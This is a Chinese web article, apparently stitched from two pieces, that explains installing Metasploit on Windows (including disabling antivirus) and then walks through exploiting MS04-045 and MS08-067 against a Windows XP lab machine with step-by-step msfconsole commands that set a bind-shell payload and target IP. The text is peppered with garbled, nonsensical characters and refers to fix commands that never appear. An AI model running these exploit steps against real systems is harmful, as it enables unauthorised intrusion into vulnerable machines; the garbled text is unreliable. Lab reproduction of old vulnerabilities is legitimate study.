如何安装metasploit

一、搭建metasploit环境

Windows环境下安装

metasploit

安装时需要注意要关闭杀毒软件，如果安装有杀毒软件，会提示在metasploit的安装目录下检测到病毒或木马。

二、metasploit的使用

Metasploit目前提供了三种用户使用接口，一个是GUI模式，另一个是console模式，第三种是CLI（命令行）模式。原来还提供一种WEB模式，目前已经不再支持。目前这三种模式各有优缺点，建议在MSF console模式中使用。在console中几乎可以使用MSF所提供的所有磨山功能，还可以在console中执行一些其它的茄迟外部命令，如ping。

Windows下GUI启动方式，从开始菜单——Metasploit Framework——Metaspliit GUI即可。如下图所示：

其GUI模式启动后界面如图2所示：

Windows下console模式的启动方式与GUI方式类似，启动后界面如图3所示：

Metasploit的使用较为简单，了解其基本命令即可。下面以console的使用方式为例说明如何使用：

输入help或？可查看帮助信颤游李息。

下面以exploit中的ms04_045_wins为例进行说明。

1、show exploits，

2、info exploit/windows/wins/ms04_045_wins，查看其描述信息。

3、use exploit/windows/wins/ms04_045_wins，使用此exploit。

4、show options，查看相应的选项

5、set RHOST    192.168.1.200，设置目标

6、set RPORT    7777，设置端口

7、set PAYLOAD generic/shell_bind_tcp，设置使用的shellcode

8、exploit，执行攻击

安装过程会出现一个error，ruby的一个nokogiri包正常安装失败，解决命令:

然颂隐后就可以直接运行msf

你也可以这样拍迹运行:

已经测试msfvenom能顺利生成野贺厅payload

所以功能基本都有

时间：2022-03-10

一、环境准备

1、需要腊岁轿轮肆准备英文的windows xp 环境。

链接： https://pan.baidu.com/s/1iN6hxbAlRHCaxPXaBiB4_g

提取码：y8mj

2、攻击工具使用的是metasploit，kali 自带。

二、雀好复现时存在的问题

1、安装完xp之后，我自己已经复现了一次，发现拿到的system没有相关命令，可能是这个新系统没有添加到环境中，之后建立了一个文档进行读取，也可直观的看到结果。其他就没遇到什么问题了。

三、复现演示

1、虚拟机准备一下xp，建立一个test的文档，查看一下靶机 IP，靶机建立完成

2、使用metasploit 进行攻击

1）、msfconsole #进入metasploit

2）、search ms08-067 #搜索相关exp

3）、use exploit/windows/smb/ms08_067_netapi #使用这个exp

4）、show payloads #搜索相关payload，能让攻击后建立连接

5）、set payload generic/shell_bind_tcp #我使用的是这个

6）、set RHOST 192.168.154.144 #设置靶机IP，让它攻击这个IP，端口默认是445，这个就不需要设置了

7）、show options #可以用这个命令查看是否把相关配置设置全了

8）、run 或 exploit #进行攻击，两个命令都可以

9）、type test.txt #之后攻击成功了，使用windows命令 就可以去相关路径下查看那个 test 文档了

演示图：

---